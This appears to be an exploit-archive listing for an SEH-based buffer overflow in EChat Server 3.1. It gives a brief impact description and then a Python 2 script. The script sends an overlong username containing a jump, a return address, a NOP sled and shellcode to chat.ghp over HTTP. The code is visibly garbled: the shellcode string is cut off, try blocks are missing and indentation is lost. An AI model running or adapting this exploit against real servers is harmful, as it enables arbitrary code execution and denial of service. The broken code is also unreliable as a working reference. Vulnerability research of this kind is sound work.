EChat Server 3.1 CHAT.ghp Buffer Overflow

EChat Server version 3.1 suffers from a buffer overflow vulnerability in CHAT.ghp.

MD5 | e8de314cc62dfc852d982ec99b634622

# Exploit Author: Juan Sacco <[email protected]>
# Vulnerability found using Exploit Pack v10 -
# Impact:
# An attacker could exploit this vulnerability to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
denial-of-service condition.
# Program description:
# Easy Chat Server is a easy, fast and affordable way to host and
manage your own real-time communication software,
# it allows friends/colleagues to chat with you through a Web Browser
(IE, Safari, Chrome, Opera etc.)
# Vendor page:

import string, sys
import socket, httplib
import struct

def exploit():
junk = '\x41' * 217
shortjmp = "\xeb\x08\xcc\xcc" # Jump over SEH
seh = struct.pack('<L', 0x100154c5) # ADD ESP,2C # POP ESI # ADD
buffersize = 2775
nops = "\x90"
# debug = "\xcc\xcc\xcc\xcc"
shellcode = ("\xbb\xc7\x16\xe0\xde\xda\xcc\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
buffer = junk + shortjmp + seh + nops * (buffersize -
(len(shellcode))) + shellcode
print buffer
URL = '/chat.ghp?username=' + buffer + '&password=null&room=1&null=2'
conn = httplib.HTTPConnection(host, port)
conn.request('GET', URL)
except Exception as Error:
print "[!] Something went wrong!"
print Error

def howtousage():
print "[!] Sorry, minimum required arguments: [host] [port]"

if __name__ == '__main__':
print "[*] EChat Server v3.1 CHAT.ghp (UserName)"
print "[*] Author: Juan Sacco <jsacco@exploitpack>"

host = sys.argv[1]
port = sys.argv[2]
except IndexError:

Related Posts